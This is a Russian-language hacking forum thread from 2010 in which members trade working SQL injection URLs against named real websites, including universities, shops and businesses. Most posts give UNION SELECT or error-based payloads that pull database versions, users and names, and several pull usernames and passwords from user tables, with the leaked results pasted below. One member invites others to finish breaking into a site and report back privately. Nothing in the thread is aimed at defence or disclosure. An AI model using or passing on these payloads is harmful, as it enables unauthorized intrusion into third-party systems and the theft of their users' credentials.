HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.12.2010, 22:32
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

http://imagine-dev.kent[antigoogle].edu/media/content/press.asp?id=712 union select 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17 from users

ТИЦ 275 PR 7
 
Ответить с цитированием

  #2  
Старый 05.12.2010, 22:47
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.culturalcapital.us/press.php?id=-8+UNION+SELECT+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12, 13--+

5.0.45:USCC:xtuscc@localhost
 
Ответить с цитированием

  #3  
Старый 06.12.2010, 15:20
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

http://www.wdminc.com/products/productdetails.php?prodID=-605+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--

4.1.22:wdminc@localhost:wdminc

доступа в information_schema нет

http://www.zenunderwater.com/products.php?prodID=5+and+1=0+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11--

4.1.22-standard:zenunder_zen@localhost:zenunder_zen

http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8,9,10--

http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,user_name,password) ,2,3,4,5,6,7,8,9,10+from+user_permission+limit+1,1-- (пароли)

5.1.48-msl-usrs-sure1-log:everyone@s215.sureserver.com.sureserver.com:as iabs_M_and_A

http://www.vaargroephoofddorp.nl/index.php?newsgroup=29+and+1=0+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7, 8,9,10,11,12,13--

5.0.77:vaargroe@localhost:vaargroe

http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8+from+hertsweb_joomla.wcow_ users--

http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,username,pass word),5,6,7,8+from+hertsweb_joomla.wcow_users-- (пароли)

5.0.51b-community-nt-log:hertsweb@81.27.104.42:hertsweb_main

http://www.sourcecodesworld.com/source/show.asp?ScriptID=-1032+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13--

4.0.30-max-log:vyom_source@208.109.138.203:vyom_source

http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11--

http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,userid,passwo rd),5,6,7,8,9,10,11+from+users-- (пароли)

5.0.91-community:a0195032_@localhost:a0195032_

http://www.igps.net/about/press.php?id=-42+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8--

5.0.51a-24+lenny4-log:Igpsweb1db@LH7800.intermedia.nethpdig

http://www.mysweetbio.es/esp/marche_descr.asp?id=27+or+1=(select+db_name())--

beautysql - бд

http://www.nitevibe.com/gallery2/gal_descr.asp?gallery_id=18+or+1=@@version--

Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) - версия

http://www.nowccc.com/detail.asp?car_cd=5017+or+1=@@version--
 
Ответить с цитированием

  #4  
Старый 06.12.2010, 17:24
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Пара средних сайтов

PR 4, тыц 60

http://www.pcid*t*b*se.com/vendor_det*ils.php?id=-240+UNION+SELECT+1,2,3,user(),version(),d*t*b*se() ,7,8,9
​Звездочку заменить на a.

К сожалению, в базе ниче интересного не нашел.

Вот еще один сайт, мы его ковыряли но тоже ниче не нашли:

PR 5, тыц 30

f cm.d k/index.php?mode=spillerinfo&ID=6%27&holdID=3&spille rID=-54%27+UNION+SELECT+1,2,3,4,5,user(),version(),d*t* b*se(),9,t*ble_n*me,11,12,13,14+FROM+inform*tion_s chem*.t*bles+LIMIT+1,1+--+
​Если вдруг таки получится- стучите в ПМ.
 
Ответить с цитированием

  #5  
Старый 06.12.2010, 17:40
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

В продолжении постам Konqi:

http://mitchison.med.[antigoogle]harvard.edu/people/peopleinfo.html?ID=-4 union select 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,1,2,3,4--
 
Ответить с цитированием

  #6  
Старый 06.12.2010, 18:28
N@b$ter
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901

Репутация: 0
Отправить сообщение для N@b$ter с помощью ICQ
По умолчанию

http://www.ticostorecr.com/ver_categoria.php?id=3+and+1=-0+union+select+concat_ws(0x3a,passwd)+from+users--
 
Ответить с цитированием

  #7  
Старый 06.12.2010, 23:51
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию

http://www.amatue21.com/index.php?do=photo&albom=7+or+1+group+by+concat((s elect+concat(version(),0x3a,user(),0x3a)),floor(ra nd(0)*2))+having+avg(0)+--+

5.0.91-community-log:amatue21_com@localhost
 
Ответить с цитированием

  #8  
Старый 07.12.2010, 00:11
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.supplementalhealthcare.com/press.php?id=3%27+UNION+SELECT+1,2,unhex%28hex%28c oncat_ws%280x3a,version%28%29,database%28%29,user% 28%29%29%29%29,4,5,6,7+LIMIT+1,1--%20+

4.1.11-Debian_4sarge8-log:supp78:shcsupport@tuna10.xmission.com
 
Ответить с цитированием

  #9  
Старый 07.12.2010, 04:26
[AvareC]
Новичок
Регистрация: 16.04.2010
Сообщений: 16
Провел на форуме:
27776

Репутация: 0
Отправить сообщение для [AvareC] с помощью ICQ
По умолчанию

по просьбе хозяина сайта уделено
 
Ответить с цитированием

  #10  
Старый 07.12.2010, 09:40
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.laterna.net/laterna/press.php?ID=-pollanenm%27+UNION+SELECT+1,2,3,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29%29,5,6,7,8, 9,10,11,12,13--+

4.1.22-standard-log:laterna:laterna@10.1.0.8
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ